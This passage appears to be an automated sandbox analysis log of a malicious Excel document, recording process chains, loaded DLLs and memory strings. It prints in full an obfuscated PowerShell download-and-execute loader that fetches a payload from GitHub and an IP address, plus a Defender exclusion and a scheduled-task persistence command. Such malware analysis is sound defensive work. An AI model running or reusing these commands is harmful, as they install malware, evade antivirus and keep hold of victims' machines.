      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, DyZNpLnfd9hpvhcF8H.csSecurity API names: _0020.AddAccessRule
      Source: 17.2.aspnet_regbrowsers.exe.49a0000.6.raw.unpack, ImBC8bCfH7H4rWrIxE.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@536/37@18/3
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0092BC3B memset,memset,??2@YAPAXI@Z,CreateThread,GetLastError,CloseHandle,LoadStringW,LoadStringW,FormatMessageW,LoadStringW,MessageBoxW,LocalFree,27_2_0092BC3B
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_0091B92E CoCreateInstance,27_2_0091B92E
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 27_2_008E2890 LoadLibraryExW,FindResourceExW,LoadResource,SizeofResource,MultiByteToWideChar,FreeLibrary,27_2_008E2890
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\FC830000Jump to behavior
      Source: C:\Users\user\AppData\Roaming\niLILOT.exeMutant created: NULL
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR9A5B.tmpJump to behavior
      Source: PO.78NO9.xlsOLE indicator, Workbook stream: true
      Source: FC830000.0.drOLE indicator, Workbook stream: true
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X............... ..........................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X...............3..........................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X...............@..........................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............X...............R..........................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..............._..........................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........r..........................s............X....... .......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X...............~..........................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~................................s............X.......$.......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............................................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............X.......2.......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s....................l.......................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X..........................................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P.............X...............+..........................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............X...............7..........................s............X...............................Jump to behavior
      Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................................8.......(.P.....................<...............................................................................
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ........................................(.P.............................d.........................................................0.......0.....
      Source: C:\Windows\SysWOW64\cmd.exeConsole Write: ......................0.........A.c.c.e.s.s. .i.s. .d.e.n.i.e.d.........P$.s..............0.....................x.......&.................0.....
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hosts
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Customers] SET [C_Fname] = @C_Fname, [C_Lname] = @C_Lname, [C_address] = @C_address, [C_City] = @C_City, [C_Country] = @C_Country, [C_datemodifay] = @C_datemodifay WHERE (([C_id] = @Original_C_id) AND ([C_Fname] = @Original_C_Fname) AND ([C_Lname] = @Original_C_Lname) AND ([C_City] = @Original_C_City) AND ([C_Country] = @Original_C_Country) AND ((@IsNull_C_datemodifay = 1 AND [C_datemodifay] IS NULL) OR ([C_datemodifay] = @Original_C_datemodifay)));
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Product] ([Product_name], [p_modifaydate]) VALUES (@Product_name, @p_modifaydate);
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Orders] ([C_id], [order_date], [sheeped_date], [O_maodifaydate]) VALUES (@C_id, @order_date, @sheeped_date, @O_maodifaydate);
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Users] SET [UserName] = @UserName, [Password] = @Password WHERE (([UserName] = @Original_UserName) AND ([Password] = @Original_Password));
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INSERT INTO [dbo].[Jurnal] ([Date], [Operation], [Table_name], [Old_values], [New_values]) VALUES (@Date, @Operation, @Table_name, @Old_values, @New_values);
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Orders] SET [C_id] = @C_id, [order_date] = @order_date, [sheeped_date] = @sheeped_date, [O_maodifaydate] = @O_maodifaydate WHERE (([Order_id] = @Original_Order_id) AND ([C_id] = @Original_C_id) AND ([order_date] = @Original_order_date) AND ([sheeped_date] = @Original_sheeped_date) AND ((@IsNull_O_maodifaydate = 1 AND [O_maodifaydate] IS NULL) OR ([O_maodifaydate] = @Original_O_maodifaydate)));
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Jurnal] SET [Date] = @Date, [Operation] = @Operation, [Table_name] = @Table_name, [Old_values] = @Old_values, [New_values] = @New_values WHERE (([Date] = @Original_Date) AND ([Operation] = @Original_Operation) AND ([Table_name] = @Original_Table_name));
      Source: powershell.exe, 0000000F.00000002.486232559.00000000035F9000.00000004.00000800.00020000.00000000.sdmp, aspnet_regbrowsers.exe, 00000011.00000002.486215001.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: UPDATE [dbo].[Product] SET [Product_name] = @Product_name, [p_modifaydate] = @p_modifaydate WHERE (([Product_id] = @Original_Product_id) AND ([Product_name] = @Original_Product_name) AND ((@IsNull_p_modifaydate = 1 AND [p_modifaydate] IS NULL) OR ([p_modifaydate] = @Original_p_modifaydate)));
      Source: PO.78NO9.xlsVirustotal: Detection: 16%
      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      Source: unknownProcess created: C:\Windows\System32\taskeng.exe taskeng.exe {6F06CFDC-8B46-4289-9A59-403AE8C9352A} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\niLILOT.exe C:\Users\user\AppData\Roaming\niLILOT.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wegivenewthingssoonsweetnes.vbS" Jump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'SU5WT0tFLWVYcFJFU1NJT04oICgnYycrJ0YxdXJsID0gJysnZlgnKydoaHR0cHM6Ly9yYScrJ3cnKycuZ2l0aHViJysndXNlcmNvbnRlJysnbnQuY28nKydtL05vJysnRGV0ZScrJ2MnKyd0T24vTm8nKydEZXRlY3RPbicrJy9yZWZzL2hlYWRzL21haW4nKycvRGV0YWhOJysnb3RoLVYuJysndHh0ZicrJ1gnKydoJysnOyBjRicrJzEnKydiYXMnKydlJysnNjRDb250JysnZW50JysnID0nKycgJysnKE5ldy0nKydPYmplY3QgJysnU3lzdCcrJ2UnKydtLicrJ04nKydldC5XZWJDJysnbGknKydlbicrJ3QpJysnLkRvd25sb2FkU3RyaW4nKydnKGNGMXVybCk7JysnIGNGJysnMWJpJysnbicrJ2EnKydyeUMnKydvbnRlbnQgPSBbU3knKydzdGVtLkMnKydvbicrJ3YnKydlJysncnQnKyddJysnOjpGcm8nKydtQmFzZTY0U3RyJysnaW5nKGNGMWJhc2U2NENvJysnbnRlJysnbnQpOyBjRjEnKydhJysnc3NlbWJseSA9IFtSJysnZWZsZWN0aScrJ29uLkFzcycrJ2VtYmx5JysnXTonKyc6TG9hZChjRicrJzFiaW5hcnknKydDb250ZW50KTsgJysnWycrJ2RubGliLklPLkhvbWVdOjpWQUkocE5BdCcrJ3gnKyd0LlJFUkMnKydDUi8zMzMvODIuMTQuJysnMDQyLjgzLy86cHR0aHBOQSwgcE4nKydBZGVzYScrJ3RpdmFkb3BOQSwgcE5BZGVzYXRpJysndmFkb3AnKydOQSwnKycgcE5BZCcrJ2VzYXRpdmFkb3BOQSwgcE5BYScrJ3NwbmV0X3InKydlZ2Jyb3dzZXJzcE5BLCBwTkFwJysnTkEnKycscE5BcCcrJ05BKScpLnJlUGxhQ2UoJ2ZYaCcsW1NUcmluR11bQ2hhcl0zOSkucmVQbGFDZSgoW0NoYXJdOTkrW0NoYXJdNzArW0NoYXJdNDkpLFtTVHJpbkddW0NoYXJdMzYpLnJlUGxhQ2UoKFtDaGFyXTExMitbQ2hhcl03OCtbQ2hhcl02NSksW1NUcmluR11bQ2hhcl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "INVOKE-eXpRESSION( ('c'+'F1url = '+'fX'+'hhttps://ra'+'w'+'.github'+'userconte'+'nt.co'+'m/No'+'Dete'+'c'+'tOn/No'+'DetectOn'+'/refs/heads/main'+'/DetahN'+'oth-V.'+'txtf'+'X'+'h'+'; cF'+'1'+'bas'+'e'+'64Cont'+'ent'+' ='+' '+'(New-'+'Object '+'Syst'+'e'+'m.'+'N'+'et.WebC'+'li'+'en'+'t)'+'.DownloadStrin'+'g(cF1url);'+' cF'+'1bi'+'n'+'a'+'ryC'+'ontent = [Sy'+'stem.C'+'on'+'v'+'e'+'rt'+']'+'::Fro'+'mBase64Str'+'ing(cF1base64Co'+'nte'+'nt); cF1'+'a'+'ssembly = [R'+'eflecti'+'on.Ass'+'embly'+']:'+':Load(cF'+'1binary'+'Content); '+'['+'dnlib.IO.Home]::VAI(pNAt'+'x'+'t.RERC'+'CR/333/82.14.'+'042.83//:ptthpNA, pN'+'Adesa'+'tivadopNA, pNAdesati'+'vadop'+'NA,'+' pNAd'+'esativadopNA, pNAa'+'spnet_r'+'egbrowserspNA, pNAp'+'NA'+',pNAp'+'NA)').rePlaCe('fXh',[STrinG][Char]39).rePlaCe(([Char]99+[Char]70+[Char]49),[STrinG][Char]36).rePlaCe(([Char]112+[Char]78+[Char]65),[STrinG][Char]34))"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\niLILOT.exe"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\niLILOT" /XML "C:\Users\user\AppData\Local\Temp\tmpB50D.tmp"Jump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"Jump to behavior
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Users\user\AppData\Roaming\niLILOT.exe C:\Users\user\AppData\Roaming\niLILOT.exe
      Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
